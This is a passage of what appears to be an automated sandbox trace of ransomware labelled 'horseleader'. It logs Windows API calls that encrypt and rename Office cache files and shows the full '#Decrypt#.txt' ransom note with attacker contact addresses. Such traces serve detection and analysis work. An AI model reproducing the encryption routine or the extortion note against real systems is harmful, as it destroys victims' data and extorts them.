[0190.947] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0190.947] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.horseleader") returned 91 [0190.948] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.horseleader")) returned 1 [0190.948] GetProcessHeap () returned 0x780000 [0190.948] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0190.949] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, 
ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0190.949] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0190.949] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0190.949] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0190.949] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0190.949] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0190.949] lstrlenW (lpString=".testttjffg") returned 11 [0190.949] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0190.949] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0190.949] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0190.949] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0190.951] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0190.972] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0190.972] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=5884) returned 1 [0190.972] ReadFile (in: hFile=0x21c, 
lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x16fc, lpOverlapped=0x0) returned 1 [0191.160] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffe904, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.161] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x16fc, lpOverlapped=0x0) returned 1 [0191.162] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.162] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0191.162] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0191.163] CloseHandle (hObject=0x21c) returned 1 [0191.169] GetProcessHeap () returned 0x780000 [0191.169] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0191.169] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0191.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all 
users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0191.172] GetProcessHeap () returned 0x780000 [0191.172] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0191.172] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0191.172] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0191.172] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0191.173] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0191.174] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0191.174] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0191.175] lstrlenA (lpString="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") returned 1368 [0191.175] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0191.176] CloseHandle (hObject=0x1cc) returned 1 [0191.176] GetProcessHeap () returned 0x780000 [0191.176] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0191.176] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0191.177] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0191.177] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned 66 [0191.177] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0191.177] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0191.177] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0191.177] GetProcessHeap () returned 0x780000 [0191.177] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0191.177] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*") returned 68 [0191.177] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0191.196] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0191.196] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.") returned 68 [0191.196] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0191.197] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0191.197] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0191.197] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0191.197] lstrlenW (lpString=".testttjffg") returned 11 [0191.197] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0191.197] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0191.198] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0191.198] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.402] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0191.403] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0191.405] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\..") returned 69 [0191.405] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0191.405] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0191.405] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0191.405] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0191.405] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0191.405] lstrlenW (lpString=".testttjffg") returned 11 [0191.405] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0191.405] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0191.405] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0191.406] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.410] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0191.410] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="Windows") returned -1 [0191.410] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0191.411] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".horseleader") returned 0x0 [0191.411] lstrcmpW (lpString1="Office32MUI.msi", lpString2="#Decrypt#.txt") returned 1 [0191.411] lstrcmpW (lpString1="Office32MUI.msi", lpString2="_uninstalling_.png") returned 1 [0191.411] lstrlenW (lpString=".testttjffg") returned 11 [0191.411] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", lpSrch=".testttjffg") returned 0x0 [0191.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0191.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) 
returned 1 [0191.414] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0191.415] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0191.415] StrStrW (lpFirst="Office32MUI.msi", lpSrch=".txt") returned 0x0 [0191.415] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=873984) returned 1 [0191.415] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.416] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.419] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.419] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.419] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x68300, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.419] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.423] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.423] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.423] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd0600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.423] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.426] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.426] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0191.427] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0191.427] CloseHandle (hObject=0x21c) returned 1 [0191.443] GetProcessHeap () returned 0x780000 [0191.443] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0191.443] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.horseleader") returned 94 [0191.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.horseleader")) returned 1 [0191.444] GetProcessHeap () returned 0x780000 [0191.445] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0191.445] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0191.445] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="Windows") returned -1 [0191.445] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0191.445] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".horseleader") returned 0x0 [0191.445] lstrcmpW (lpString1="Office32MUI.xml", lpString2="#Decrypt#.txt") returned 1 [0191.445] lstrcmpW (lpString1="Office32MUI.xml", lpString2="_uninstalling_.png") returned 1 [0191.445] lstrlenW (lpString=".testttjffg") returned 11 [0191.445] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".testttjffg") returned 0x0 [0191.445] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0191.445] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0191.446] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0191.446] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0191.446] StrStrW (lpFirst="Office32MUI.xml", lpSrch=".txt") returned 0x0 [0191.446] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1383) returned 1 [0191.446] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x567, lpOverlapped=0x0) returned 1 [0191.449] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffa99, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.449] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x567, lpOverlapped=0x0) returned 1 [0191.449] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.450] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0191.450] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0191.450] CloseHandle (hObject=0x21c) returned 1 [0191.491] GetProcessHeap () returned 0x780000 [0191.491] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0191.491] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.horseleader") returned 94 [0191.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.horseleader")) returned 1 [0191.492] GetProcessHeap () returned 0x780000 [0191.492] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) 